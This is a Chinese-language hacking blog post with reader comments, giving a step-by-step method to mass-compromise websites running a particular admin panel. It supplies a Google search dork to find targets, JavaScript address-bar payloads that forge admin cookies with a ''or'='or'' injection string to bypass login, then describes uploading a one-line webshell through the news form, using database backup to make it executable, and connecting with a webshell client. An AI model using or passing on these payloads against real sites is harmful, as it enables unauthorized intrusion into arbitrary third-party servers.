利用关键字后台批量拿shell

作者:qxz_xp   发布:2013-10-22 12:55   分类:黑客技术, 黑客攻防   2条评论  

google:关键字:inurl:szwyadmin/login.asp

打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1”));

如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB

然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。

进入后台后在添加新闻的地方上传一句话后,复制链接地址:

szwyadmin

然后点击备份如下图:

20131022124743

然后点击备份数据,备份成功后得到地址:

20131022130809

拿起菜刀链接:

20131022125456

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3731.html

QQ空间 微信 腾讯微博 新浪微博 我的搜狐 人人网 天涯社区 百度贴吧 更多
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 带你了解后渗透工具Koadic(5)
  2. 揭露全自动化黑产 自动批量SHELL一条龙工具(1)
  3. 利用phpmyadmin执行语句拿webshell(1)
  4. 分享上传图片shell的绕过过滤的几种方法
  5. 后台拿webshell常用技巧总汇
  6. 入侵网站webshell提权服务器20种思路
  7. 谈谈WordPress程序的入侵思路和防御
  8. 另类突破数据库备份过滤拿shell
  9. phpcms v9前台上传头像getshell
  10. phpweb后台拿shell简单方法(4)
  11. 服务器提权之webshell提权总结(1)
  12. 入侵网站时的十种小经验
  13. 未成年“黑客”非法入侵部门官网被处罚5000元
  14. FCK突破建立文件夹后台拿shell(1)
  15. 记一次phpcms v9后台拿shell过程(3)
  16. aspcms后台拿shell的两种方法

利用关键字后台批量拿shell:目前有2 条留言

  1. 0楼
    tester:

    您好,添加新闻的地方的一句话具体代码是?谢谢!麻烦发到邮箱jxbsuedu@gmail.com

    2014-07-28 14:31 [回复]
  2. 0楼
    小飞龙:

    学习了

    2013-10-23 05:36 [回复]

发表评论

5 + 5 =

快捷键:Ctrl+Enter